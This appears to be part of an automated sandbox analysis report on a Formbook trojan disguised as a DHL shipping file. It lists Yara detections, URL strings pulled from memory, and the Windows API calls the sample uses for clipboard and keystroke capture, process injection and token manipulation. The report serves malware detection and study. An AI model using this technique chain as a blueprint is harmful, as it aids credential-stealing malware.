            Source: netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.0000000007802000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.0000000004982000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.0000000007802000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.0000000004982000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000003.00000002.4179067242.0000000002EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000003.00000002.4179067242.0000000002EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000003.00000002.4179067242.0000000002EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000003.00000002.4179067242.0000000002EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000003.00000002.4179067242.0000000002EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000003.00000002.4179067242.0000000002EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000003.00000003.2060891314.0000000007F82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.0000000007E4A000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.0000000004FCA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?Sj=mxnR
            Source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.00000000074DE000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.000000000465E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4182597345.0000000006520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: netbtugc.exe, 00000003.00000002.4182597345.0000000006520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E1EAFF
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E1ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E1ED6A
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E1EAFF
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00E0AA57
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E39576

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4179871193.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1883549060.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4190913591.0000000008D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4179927444.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1883088525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4178788966.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1884125832.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4180201411.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4179871193.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1883549060.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4190913591.0000000008D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4179927444.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1883088525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4178788966.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1884125832.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4180201411.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: DHL 073412182024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: DHL 073412182024.exe, 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8a49efd2-e
            Source: DHL 073412182024.exe, 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5b778cab-c
            Source: DHL 073412182024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_05e31240-7
            Source: DHL 073412182024.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f30fcb2e-2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042B363 NtClose,1_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B60 NtClose,LdrInitializeThunk,1_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034735C0 NtCreateMutant,LdrInitializeThunk,1_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474340 NtSetContextThread,1_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474650 NtSuspendThread,1_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BE0 NtQueryValueKey,1_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BF0 NtAllocateVirtualMemory,1_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B80 NtQueryInformationFile,1_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BA0 NtEnumerateValueKey,1_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AD0 NtReadFile,1_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AF0 NtWriteFile,1_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AB0 NtWaitForSingleObject,1_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F60 NtCreateProcessEx,1_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F30 NtCreateSection,1_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FE0 NtCreateFile,1_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F90 NtProtectVirtualMemory,1_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FA0 NtQuerySection,1_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FB0 NtResumeThread,1_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E30 NtWriteVirtualMemory,1_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EE0 NtQueueApcThread,1_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E80 NtReadVirtualMemory,1_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EA0 NtAdjustPrivilegesToken,1_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D00 NtSetInformationFile,1_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D10 NtMapViewOfSection,1_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D30 NtUnmapViewOfSection,1_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DD0 NtDelayExecution,1_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DB0 NtEnumerateKey,1_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C60 NtCreateKey,1_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C00 NtQueryInformationProcess,1_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CC0 NtQueryVirtualMemory,1_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CF0 NtOpenProcess,1_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CA0 NtQueryInformationToken,1_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473010 NtOpenDirectoryObject,1_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473090 NtSetValueKey,1_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034739B0 NtGetContextThread,1_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473D70 NtOpenThread,1_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473D10 NtOpenProcessToken,1_2_03473D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E4340 NtSetContextThread,LdrInitializeThunk,3_2_034E4340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E4650 NtSuspendThread,LdrInitializeThunk,3_2_034E4650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2B60 NtClose,LdrInitializeThunk,3_2_034E2B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_034E2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_034E2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_034E2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2AD0 NtReadFile,LdrInitializeThunk,3_2_034E2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2AF0 NtWriteFile,LdrInitializeThunk,3_2_034E2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2F30 NtCreateSection,LdrInitializeThunk,3_2_034E2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2FE0 NtCreateFile,LdrInitializeThunk,3_2_034E2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2FB0 NtResumeThread,LdrInitializeThunk,3_2_034E2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_034E2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_034E2E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_034E2D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_034E2D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2DD0 NtDelayExecution,LdrInitializeThunk,3_2_034E2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_034E2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2C60 NtCreateKey,LdrInitializeThunk,3_2_034E2C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_034E2C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_034E2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E35C0 NtCreateMutant,LdrInitializeThunk,3_2_034E35C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E39B0 NtGetContextThread,LdrInitializeThunk,3_2_034E39B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2B80 NtQueryInformationFile,3_2_034E2B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2AB0 NtWaitForSingleObject,3_2_034E2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2F60 NtCreateProcessEx,3_2_034E2F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2F90 NtProtectVirtualMemory,3_2_034E2F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2FA0 NtQuerySection,3_2_034E2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2E30 NtWriteVirtualMemory,3_2_034E2E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2EA0 NtAdjustPrivilegesToken,3_2_034E2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2D00 NtSetInformationFile,3_2_034E2D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2DB0 NtEnumerateKey,3_2_034E2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2C00 NtQueryInformationProcess,3_2_034E2C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2CC0 NtQueryVirtualMemory,3_2_034E2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E2CF0 NtOpenProcess,3_2_034E2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E3010 NtOpenDirectoryObject,3_2_034E3010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E3090 NtSetValueKey,3_2_034E3090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E3D70 NtOpenThread,3_2_034E3D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E3D10 NtOpenProcessToken,3_2_034E3D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B57A70 NtReadFile,3_2_02B57A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B57BE0 NtClose,3_2_02B57BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B57B50 NtDeleteFile,3_2_02B57B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B57920 NtCreateFile,3_2_02B57920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B57D30 NtAllocateVirtualMemory,3_2_02B57D30
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E0D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00E0D5EB
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00E01201
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E0E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E0E8F6
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DABF400_2_00DABF40
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E120460_2_00E12046
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DA80600_2_00DA8060
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E082980_2_00E08298
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DDE4FF0_2_00DDE4FF
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DD676B0_2_00DD676B
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E348730_2_00E34873
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DACAF00_2_00DACAF0
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DCCAA00_2_00DCCAA0
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DBCC390_2_00DBCC39
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DD6DD90_2_00DD6DD9
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DA91C00_2_00DA91C0
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DBB1190_2_00DBB119
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC13940_2_00DC1394
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC17060_2_00DC1706
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC781B0_2_00DC781B
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC19B00_2_00DC19B0
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DB997D0_2_00DB997D
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DA79200_2_00DA7920
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC7A4A0_2_00DC7A4A
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC7CA70_2_00DC7CA7
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC1C770_2_00DC1C77
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DD9EEE0_2_00DD9EEE
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E2BE440_2_00E2BE44
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC1F320_2_00DC1F32
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00FF02480_2_00FF0248
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168711_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168731_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028A01_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101731_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011101_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E1F31_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012901_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004035001_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040268A1_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026981_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026A01_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF4A1_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D7531_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF531_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA3521_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F01_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035003E61_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E02741_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C02C01_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C81581_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034301001_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA1181_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F81CC1_2_034F81CC
